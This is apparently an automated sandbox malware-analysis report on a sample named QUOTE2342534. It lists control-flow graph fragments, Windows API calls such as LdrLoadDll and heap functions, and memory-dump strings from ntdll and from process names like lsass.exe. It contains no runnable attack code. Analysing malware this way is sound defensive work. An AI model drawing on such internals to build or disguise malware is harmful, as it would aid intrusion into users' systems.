                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 00414017
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 107 42c863-42c8a4 call 404873 call 42d733 RtlFreeHeap
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C89F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                • String ID: 4dA
                                                                                                                                                                                                                                                • API String ID: 3298025750-3697888251

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 438 4177a4-4177a5 439 4177a6-4177a7 438->439 439->439 440 4177a9 439->440 441 4177ab-4177c1 440->441 442 41773d-417741 440->442 443 417743-417757 LdrLoadDll 442->443 444 41775a-41775d 442->444 443->444
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 445 42c813-42c857 call 404873 call 42d733 RtlAllocateHeap
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,0041E4B1,?,?,00000000,?,0041E4B1,?,?,?), ref: 0042C852
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 455 42c8b3-42c8ef call 404873 call 42d733 ExitProcess
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,53E499F8,?,?,53E499F8), ref: 0042C8EA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • corrupted critical section, xrefs: 017954C2
                                                                                                                                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01795543
                                                                                                                                                                                                                                                • double initialized or corrupted critical section, xrefs: 01795508
                                                                                                                                                                                                                                                • Thread identifier, xrefs: 0179553A
                                                                                                                                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
                                                                                                                                                                                                                                                • 8, xrefs: 017952E3
                                                                                                                                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
                                                                                                                                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
                                                                                                                                                                                                                                                • Critical section address., xrefs: 01795502
                                                                                                                                                                                                                                                • Critical section debug info address, xrefs: 0179541F, 0179552E
                                                                                                                                                                                                                                                • Invalid debug info address of this critical section, xrefs: 017954B6
                                                                                                                                                                                                                                                • Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
                                                                                                                                                                                                                                                • Critical section address, xrefs: 01795425, 017954BC, 01795534
                                                                                                                                                                                                                                                • undeleted critical section in freed memory, xrefs: 0179542B
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
                                                                                                                                                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
                                                                                                                                                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
                                                                                                                                                                                                                                                • @, xrefs: 0179259B
                                                                                                                                                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
                                                                                                                                                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
                                                                                                                                                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
                                                                                                                                                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
                                                                                                                                                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
                                                                                                                                                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
                                                                                                                                                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • VerifierFlags, xrefs: 017A8C50
                                                                                                                                                                                                                                                • VerifierDebug, xrefs: 017A8CA5
                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
                                                                                                                                                                                                                                                • HandleTraces, xrefs: 017A8C8F
                                                                                                                                                                                                                                                • VerifierDlls, xrefs: 017A8CBD
                                                                                                                                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                                                                • API String ID: 0-1109411897
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-792281065
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
                                                                                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
                                                                                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
                                                                                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 01716496
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-204845295
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
                                                                                                                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
                                                                                                                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01792165
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                                • API String ID: 0-861424205
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
                                                                                                                                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 0175C6C4
                                                                                                                                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01798170
                                                                                                                                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                • API String ID: 0-475462383
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1404860816-0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01758421
                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 01758422
                                                                                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E
                                                                                                                                                                                                                                                • @, xrefs: 01758591
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • .Local, xrefs: 017528D8
                                                                                                                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 017921DE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
                                                                                                                                                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
                                                                                                                                                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
                                                                                                                                                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
                                                                                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 01742462
                                                                                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 0178A998
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 01733255
                                                                                                                                                                                                                                                • HEAP: , xrefs: 01733264
                                                                                                                                                                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $@
                                                                                                                                                                                                                                                • API String ID: 0-1077428164
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0178A121
